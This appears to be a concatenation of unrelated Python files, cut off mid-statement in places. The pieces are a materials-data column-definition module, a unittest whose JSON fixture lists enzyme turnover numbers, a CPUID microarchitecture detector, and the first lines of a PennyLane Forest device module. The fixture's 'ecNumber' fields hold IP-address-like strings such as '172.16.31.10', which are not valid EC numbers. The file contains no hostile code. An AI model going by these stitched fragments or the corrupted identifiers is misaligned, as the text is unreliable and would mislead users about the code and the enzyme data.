return ["data_source", "quantile", "target_units", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
quantile: float,
target_units: Optional[str] = None):
self.data_source = _make_data_source(data_source)
self.quantile = quantile
self.target_units = target_units
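# Illustrative sketch (added): building a few real-valued column definitions
# against a variable identified by name. "stress" and the MPa units are
# hypothetical placeholders; a Variable instance works equally well as
# data_source. Wrapped in a function so nothing runs at import time.
def _example_real_columns():
    return [
        MeanColumn(data_source="stress", target_units="MPa"),
        StdDevColumn(data_source="stress", target_units="MPa"),
        QuantileColumn(data_source="stress", quantile=0.25, target_units="MPa"),
    ]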
class OriginalUnitsColumn(Serializable["OriginalUnitsColumn"], Column):
"""[ALPHA] Column containing the units as entered in the source data.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="original_units_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MostLikelyCategoryColumn(Serializable["MostLikelyCategoryColumn"], Column):
"""[ALPHA] Column containing the most likely category.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="most_likely_category_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MostLikelyProbabilityColumn(Serializable["MostLikelyProbabilityColumn"], Column):
"""[ALPHA] Column containing the probability of the most likely category.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="most_likely_probability_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class FlatCompositionColumn(Serializable["FlatCompositionColumn"], Column):
"""[ALPHA] Column that flattens the composition into a string of names and quantities.
The numeric formatting tries to be human readable. For example, if all of the quantities
    are round numbers like ``{"spam": 4.0, "eggs": 1.0}`` then the result omits the decimal points
like ``"(spam)4(eggs)1"`` (if sort_order is by quantity).
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
sort_order: CompositionSortOrder
order with which to sort the components when generating the flat string
"""
data_source = properties.String('data_source')
sort_order = properties.Enumeration(CompositionSortOrder, 'sort_order')
typ = properties.String('type', default="flat_composition_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "sort_order", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
sort_order: CompositionSortOrder):
self.data_source = _make_data_source(data_source)
self.sort_order = sort_order
class ComponentQuantityColumn(Serializable["ComponentQuantityColumn"], Column):
"""[ALPHA] Column that extracts the quantity of a given component.
If the component is not present in the composition, then the value in the column will be 0.0.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
component_name: str
name of the component from which to extract the quantity
normalize: bool
whether to normalize the quantity by the sum of all component amounts. Default is false
"""
data_source = properties.String('data_source')
component_name = properties.String("component_name")
normalize = properties.Boolean("normalize")
typ = properties.String('type', default="component_quantity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "component_name", "normalize", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
component_name: str,
normalize: bool = False):
self.data_source = _make_data_source(data_source)
self.component_name = component_name
self.normalize = normalize
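# Illustrative sketch (added): composition-oriented columns. The variable name
# "formulation" and component name "water" are hypothetical; sort_order uses the
# CompositionSortOrder enum defined at the top of this module.
def _example_composition_columns():
    return [
        FlatCompositionColumn(data_source="formulation",
                              sort_order=CompositionSortOrder.QUANTITY),
        ComponentQuantityColumn(data_source="formulation",
                                component_name="water", normalize=True),
    ]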
class NthBiggestComponentNameColumn(Serializable["NthBiggestComponentNameColumn"], Column):
"""[ALPHA] Name of the Nth biggest component.
If there are fewer than N components in the composition, then this column will be empty.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
n: int
index of the component name to extract, starting with 1 for the biggest
"""
data_source = properties.String('data_source')
n = properties.Integer("n")
typ = properties.String('type', default="biggest_component_name_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "n", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
n: int):
self.data_source = _make_data_source(data_source)
self.n = n
class NthBiggestComponentQuantityColumn(Serializable["NthBiggestComponentQuantityColumn"], Column):
"""[ALPHA] Quantity of the Nth biggest component.
If there are fewer than N components in the composition, then this column will be empty.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
n: int
index of the component quantity to extract, starting with 1 for the biggest
normalize: bool
whether to normalize the quantity by the sum of all component amounts. Default is false
"""
data_source = properties.String('data_source')
n = properties.Integer("n")
normalize = properties.Boolean("normalize")
typ = properties.String('type',
default="biggest_component_quantity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "n", "normalize", "typ"]
def __init__(self, *,
data_source: Union[str, Variable],
n: int,
normalize: bool = False):
self.data_source = _make_data_source(data_source)
self.n = n
self.normalize = normalize
class IdentityColumn(Serializable['IdentityColumn'], Column):
"""[ALPHA] Column containing the value of a string-valued variable.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
"""
data_source = properties.String('data_source')
typ = properties.String('type', default="identity_column", deserializable=False)
def _attrs(self) -> List[str]:
return ["data_source", "typ"]
def __init__(self, *, data_source: Union[str, Variable]):
self.data_source = _make_data_source(data_source)
class MolecularStructureColumn(Serializable['MolecularStructureColumn'], Column):
"""[ALPHA] Column containing a representation of a molecular structure.
Parameters
----------
data_source: Union[str, Variable]
name of the variable to use when populating the column
format: ChemicalDisplayFormat
the format in which to display the molecular structure
"""
data_source = properties.String('data_source')
format = properties.Enumeration(ChemicalDisplayFormat, 'format')
typ = properties.String('type', default="molecular_structure_column", deserializable=False)
def | |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 19 23:45:56 2018
@author: dimitricoukos
"""
import unittest
import json
import DataTreatment
from DataTreatment import openJson, write
class SampleData(unittest.TestCase):
initial_input = {
"GLNLASEer": {
"N-octanoyl-DL-homoserine lactone": [],
"5-butyl-4-methyldihydro-2(3H)-furanone": [],
"gamma-undecanolactone": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3.92",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.25",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.55",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.63",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.95",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "5.64",
"ecNumber": "172.16.31.10"
}
],
"gamma-dodecanolactone": [],
"N-(3-oxododecanoyl)-L-homoserine lactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "1.01",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "1.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "6.44",
"ecNumber": "172.16.31.10"
}
],
"nonanoic-1,5-lactone": [],
"gamma-dodecalactone": [],
"N-(3-oxodecanoyl)-L-homoserine lactone": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "0.19",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "0.6",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "3.96",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "4.52",
"ecNumber": "172.16.31.10"
}
],
"gamma-dodecanoic lactone": [
{
"organism": "Homo sapiens",
"turnoverNumber": "101",
"ecNumber": "172.16.31.10"
}
],
"gamma-heptalactone": [],
"undecanoic-gamma-lactone": [],
"N-(2-oxotetrahydrofuran-3-yl)pentanamide": [],
"N-octanoylhomoserine lactone": [],
"nonanoic-gamma-lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "2",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "3.1",
"ecNumber": "172.16.31.10"
}
],
"5-(thiobutyl)butyrolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "7.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "19.4",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "116",
"ecNumber": "172.16.31.10"
}
],
"N-hexanoylhomoserine lactone": [],
"N-(3-oxodecanoyl)-DL-homoserine lactone": [],
"delta-undecalactone": [],
"delta-dodecalactone": [],
"gamma-(S)-valerolactone": [],
"gamma-undecalactone": [],
"gamma-(R)-valerolactone": [],
"octanoyl-L-homoserine lactone": [],
"N-(3-oxododecanoyl)-DL-homoserine lactone": [],
"gamma-(S)-caprolactone": [],
"dodecanoic-1,5-lactone": [],
"gamma-nonanoic acid lactone": [],
"gamma-heptanolactone": [],
"Paraoxon": [
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "8.47",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "12.6",
"ecNumber": "172.16.31.10"
}
],
"dodecanoic-gamma-lactone": [],
"undecanoic-1,5-lactone": [],
"gamma-heptanolide": [
{
"organism": "Sulfolobus acidocaldarius",
"turnoverNumber": "10.25",
"ecNumber": "172.16.31.10"
},
{
"organism": "Homo sapiens",
"turnoverNumber": "34",
"ecNumber": "172.16.31.10"
}
],
"delta-undecanolactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "12.65",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "44.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "56.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "58",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "66.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "71.2",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "93.3",
"ecNumber": "172.16.31.10"
}
],
"gamma-nonalactone": [
{
"wild-type": True,
"organism": "Sulfolobus solfataricus",
"turnoverNumber": "5.54",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "5.57",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "31",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "44.49",
"ecNumber": "172.16.31.10"
}
],
"N-(3-oxohexanoyl)-L-homoserine lactone": [],
"N-(3-oxooctanoyl)-L-homoserine lactone": [],
"3-oxo-octanoyl-L-homoserine lactone": [],
"gamma-dodecanoic acid lactone": [],
"gamma-(R)-caprolactone": [],
"4-methoxy phenyl acetate": [],
"epsilon-caprolactone": [
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "7.27",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus acidocaldarius",
"turnoverNumber": "15.04",
"ecNumber": "172.16.31.10"
}
],
"Gamma-caprolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "25",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "44",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "44",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "112.3",
"ecNumber": "172.16.31.10"
}
],
"gamma-butyrolactone": [
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "5.75",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "111",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "111",
"ecNumber": "172.16.31.10"
}
],
"delta-valerolactone": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.5",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.9",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "29.8",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "40",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "69.4",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "94",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "156",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "210",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "632",
"ecNumber": "172.16.31.10"
}
],
"gamma-undecanoiclactone": [],
"9-oxo-N-(2-oxotetrahydrofuran-3-yl)undecanamide": [],
"N-(3-oxooctanoyl)-DL-homoserine lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "0.92",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "0.97",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "4.1",
"ecNumber": "172.16.31.10"
}
],
"N-dodecanoylhomoserine lactone": [],
"nonanoic-delta-lactone": [],
"7-oxo-N-(2-oxotetrahydrofuran-3-yl)nonanamide": [],
"dodecanoic-delta-lactone": [],
"dihydrocoumarin": [
{
"organism": "Homo sapiens",
"turnoverNumber": "152",
"ecNumber": "172.16.31.10"
}
],
"N-dodecanoyl-DL-homoserine lactone": [],
"dodecanoic-1,4-lactone": [],
"gamma-undecanoic acid lactone": [],
"delta-nonalactone": [
{
"organism": "Homo sapiens",
"turnoverNumber": "48",
"ecNumber": "172.16.31.10"
},
{
"organism": "Vulcanisaeta moutnovskia",
"turnoverNumber": "88.91",
"ecNumber": "172.16.31.10"
}
],
"undecanoic-1,4-lactone": [],
"pantoyl lactone": [],
"nonanoic-1,4-lactone": [],
"N-(3-oxohexanoyl)homoserine lactone": [],
"undecanoic-delta-lactone": [
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "12.9",
"ecNumber": "172.16.31.10"
},
{
"wild-type": False,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "14.1",
"ecNumber": "172.16.31.10"
},
{
"wild-type": True,
"organism": "Sulfolobus islandicus",
"turnoverNumber": "17.65",
"ecNumber": "172.16.31.10"
}
],
"3-oxo-decanoyl-L-homoserine lactone": [],
"N-(3-oxooctanoyl)homoserine lactone": []
},
"CYSTS": {
"L-Ser": [],
"homocysteine": [
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "6.2",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "7.38",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "15.5",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "32.1",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "34",
"ecNumber": "172.16.58.3"
}
],
"L-homocysteine": [
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "0.031",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.04",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.09",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.85",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "3.3",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.66",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "7.93",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "9.06",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "12.7",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "17",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "21.5",
"ecNumber": "172.16.58.3"
}
],
"L-cystathionine": [
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.083",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.133",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.418",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.56",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.56",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "1.03",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "6.08",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "6.08",
"ecNumber": "172.16.58.3"
}
],
"L-cysteine": [
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "1.95",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "3.13",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "3.13",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.39",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "4.39",
"ecNumber": "172.16.58.3"
}
],
"L-serine": [
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.082",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Homo sapiens",
"turnoverNumber": "0.15",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.45",
"ecNumber": "172.16.58.3"
},
{
"wild-type": True,
"organism": "Homo sapiens",
"turnoverNumber": "0.52",
"ecNumber": "172.16.58.3"
},
{
"wild-type": False,
"organism": "Saccharomyces cerevisiae",
"turnoverNumber": "0.85",
"ecNumber": | |
import struct
import cpuid_native
def cpuid(leaf):
_, a, b, c, d = cpuid_native.get_cpuid(leaf)
return (a, b, c, d)
def cpuid_count(leaf, subleaf):
_, a, b, c, d = cpuid_native.get_cpuid_count(leaf, subleaf)
return (a, b, c, d)
def cpu_vendor():
_, b, c, d = cpuid(0)
return struct.pack("III", b, d, c).decode("utf-8")
def cpu_name():
return "".join((struct.pack("IIII", *cpuid(0x80000000 + i)).decode("utf-8")
for i in range(2, 5))).strip()
def xgetbv(ctr):
return cpuid_native.xgetbv(ctr)
def _is_set(id, reg_idx, bit):
regs = cpuid(id)
if (1 << bit) & regs[reg_idx]:
return "Yes"
else:
return "--"
def _is_bmi2(b):
# (feature_string[0 + 8 / 8] & (1 << (8 % 8))) == 0
bit_BMI2 = 0x00000100
return b & bit_BMI2 != 0
def _is_bmi2_cpuid():
_, b, _, _ = cpuid_count(7, 0)
return _is_bmi2(b)
def _is_osxsave(c):
# cpuid_osxsave = (feature_string[11] >> 3) & 1;
bit_OSXSAVE = 0x08000000 # (1 << 27)
return c & bit_OSXSAVE != 0
def _is_osxsave_cpuid():
_, _, c, _ = cpuid(1)
return _is_osxsave(c)
def _is_avx(c):
# cpuid_avx = (feature_string[11] >> 4) & 1;
bit_AVX = 0x10000000 # (1 << 28)
return c & bit_AVX != 0
def _is_avx_cpuid():
_, _, c, _ = cpuid(1)
return _is_avx(c)
def _is_long_mode(d):
# CPUID (feature_string, 0x80000001);
# cpuid_64bit = (feature_string[7] >> 5) & 1;
bit_LM = 0x20000000 # (1 << 29)
return d & bit_LM != 0
def _is_long_mode_cpuid():
_, _, _, d = cpuid(0x80000001)
return _is_long_mode(d)
# https://en.wikichip.org/wiki/intel/cpuid
def _intel(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 5:
if model <= 2:
modelstr = "pentium"
elif model >= 4:
modelstr = "pentiummmx"
elif family == 6:
if model <= 1:
modelstr = "pentiumpro"
elif model <= 6:
modelstr = "pentium2"
elif model <= 8:
modelstr = "pentium3"
elif model <= 9:
modelstr = "pentiumm"
elif model <= 0x0c:
modelstr = "pentium3"
elif model <= 0x0e:
modelstr = "pentiumm"
elif model <= 0x19:
cpu_64bit = 1
modelstr = "core2"
elif model == 0x1a:
cpu_64bit = 1
modelstr = "nehalem" # NHM Gainestown */
elif model == 0x1c:
cpu_64bit = 1
modelstr = "atom" # Silverthorne */
elif model == 0x1d:
cpu_64bit = 1
modelstr = "core2" # PNR Dunnington */
elif model == 0x1e:
cpu_64bit = 1
modelstr = "nehalem" # NHM Lynnfield/Jasper */
elif model == 0x25:
cpu_64bit = 1
modelstr = "westmere" # WSM Clarkdale/Arrandale */
elif model == 0x26:
cpu_64bit = 1
modelstr = "atom" # Lincroft */
elif model == 0x27:
cpu_64bit = 1
modelstr = "atom" # Saltwell */
elif model == 0x2a:
cpu_64bit = 1
cpu_avx=1
modelstr = "sandybridge"# SB */
elif model == 0x2c:
cpu_64bit = 1
modelstr = "westmere" # WSM Gulftown */
elif model == 0x2d:
cpu_64bit = 1
cpu_avx=1
modelstr = "sandybridge"# SBC-EP */
elif model == 0x2e:
cpu_64bit = 1
modelstr = "nehalem" # NHM Beckton */
elif model == 0x2f:
cpu_64bit = 1
modelstr = "westmere" # WSM Eagleton */
elif model == 0x36:
cpu_64bit = 1
modelstr = "atom" # Cedarview/Saltwell */
elif model == 0x37:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x3a:
cpu_64bit = 1
cpu_avx=1
modelstr = "ivybridge" # IBR */
elif model == 0x3c:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell client */
elif model == 0x3d:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell */
elif model == 0x3e:
cpu_64bit = 1
cpu_avx=1
modelstr = "ivybridge" # Ivytown */
elif model == 0x3f:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell server */
elif model == 0x45:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Haswell ULT */
elif model == 0x46:
cpu_64bit = 1
cpu_avx=1
modelstr = "haswell" # Crystal Well */
elif model == 0x47:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell */
elif model == 0x4a:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x4c:
cpu_64bit = 1
modelstr = "silvermont" # Airmont */
elif model == 0x4d:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont/Avoton */
elif model == 0x4e:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake" # Skylake client */
elif model == 0x4f:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell server */
elif model == 0x55:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake-avx512" # Skylake server */
elif model == 0x56:
cpu_64bit = 1
cpu_avx=1
modelstr = "broadwell" # Broadwell microserver */
elif model == 0x57:
cpu_64bit = 1
modelstr = "knightslanding" # aka Xeon Phi */
elif model == 0x5a:
cpu_64bit = 1
modelstr = "silvermont" # Silvermont */
elif model == 0x5c:
cpu_64bit = 1
modelstr = "goldmont" # Goldmont */
elif model == 0x5e:
cpu_64bit = 1
cpu_avx=1
modelstr = "skylake" # Skylake */
elif model == 0x5f:
cpu_64bit = 1
modelstr = "goldmont" # Goldmont */
elif model == 0x8e:
cpu_64bit = 1
cpu_avx=1
modelstr = "kabylake" # Kabylake Y/U */
elif model == 0x9e:
cpu_64bit = 1
cpu_avx=1
modelstr = "kabylake" # Kabylake desktop */
else:
cpu_64bit = 1
modelstr = "nehalem" # default */
if modelstr == "haswell" or modelstr == "broadwell" or modelstr == "skylake":
# Some haswell, broadwell, skylake lack BMI2. Let them appear as sandybridge for now.
if not _is_bmi2_cpuid() or _workaround_skylake_cpuid_bug():
modelstr = "sandybridge"
elif family == 15:
cpu_64bit = 1
modelstr = "pentium4"
return modelstr, cpu_64bit, cpu_avx
def _amd(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 5:
if model <= 3:
modelstr = "k5"
elif model <= 7:
modelstr = "k6"
elif model == 8:
modelstr = "k62"
elif model == 9:
modelstr = "k63"
elif model == 10:
modelstr = "geode"
elif model == 13:
modelstr = "k63"
elif family == 6:
modelstr = "athlon"
elif family == 15: # K8, K9
cpu_64bit = 1
modelstr = "k8"
elif family == 16: # K10
cpu_64bit = 1
modelstr = "k10"
elif family == 17: # Hybrid k8/k10, claim k8
cpu_64bit = 1
modelstr = "k8"
elif family == 18: # Llano, uses K10 core
cpu_64bit = 1
modelstr = "k10"
elif family == 19: # AMD Internal, assume future K10
cpu_64bit = 1
modelstr = "k10"
elif family == 20: # Bobcat
cpu_64bit = 1
modelstr = "bobcat"
elif family == 21: # Bulldozer
cpu_64bit = 1
cpu_avx = 1
if model <= 1:
modelstr = "bulldozer"
elif model < 0x20: # really 2, [0x10-0x20)
modelstr = "piledriver"
elif model < 0x40: # really [0x30-0x40)
modelstr = "steamroller"
else: # really [0x60-0x70)
modelstr = "excavator"
elif family == 22: # Jaguar, an improved bobcat
cpu_64bit = 1
cpu_avx = 1
modelstr = "jaguar"
return modelstr, cpu_64bit, cpu_avx
def _centaur_hauls(family, model):
cpu_64bit = 0
cpu_avx = 0
modelstr = ""
if family == 6:
if model < 9:
modelstr = "viac3"
elif model < 15:
modelstr = "viac32"
else:
cpu_64bit = 1
modelstr = "nano"
return modelstr, cpu_64bit, cpu_avx
def _workaround_skylake_cpuid_bug():
# Example strings:
# "Intel(R) Pentium(R) CPU G4400 @ 3.30GHz"
# "Intel(R) Core(TM) i5-6600K CPU @ 3.50GHz"
# ^ ^ ^
# 0x80000002 0x80000003 0x80000004
# We match out just the 0x80000003 part here.
    # In their infinite wisdom, Intel decided to use one register order for
# the vendor string, and another for the processor name string. We shuffle
# things about here, rather than write a new variant of our assembly cpuid.
bad_cpus = [" G44", " G45", " G39" ]
processor_name_string = struct.pack("IIII", *cpuid(0x80000003)).decode("utf-8")
for bad in bad_cpus:
if bad in processor_name_string:
return True
return False
def cpu_microarchitecture():
fms, b, c, d = cpuid(1)
family = ((fms >> 8) & 0xf) + ((fms >> 20) & 0xff)
model = ((fms >> 4) & 0xf) + ((fms >> 12) & 0xf0)
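    # Worked example (added): a Skylake desktop part reports fms == 0x000506E3 from
    # CPUID leaf 1. Then (fms >> 8) & 0xf == 6 with extended family 0, so family == 6,
    # and (fms >> 4) & 0xf == 0xE plus (fms >> 12) & 0xf0 == 0x50 gives model == 0x5E,
    # which the Intel table above maps to "skylake".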
vendor_string = cpu_vendor()
if vendor_string == "GenuineIntel":
modelstr, cpu_64bit, cpu_avx = _intel(family, model)
elif vendor_string == "AuthenticAMD":
modelstr, cpu_64bit, cpu_avx = _amd(family, model)
# elif vendor_string == "CyrixInstead":
# #TODO(bitprim): Should recognize Cyrix' processors too.
elif vendor_string == "CentaurHauls":
modelstr, cpu_64bit, cpu_avx = _centaur_hauls(family, model)
cpuid_64bit = _is_long_mode_cpuid()
suffix = ''
if | |
"""
Base Forest device class
========================
**Module name:** :mod:`pennylane_forest.device`
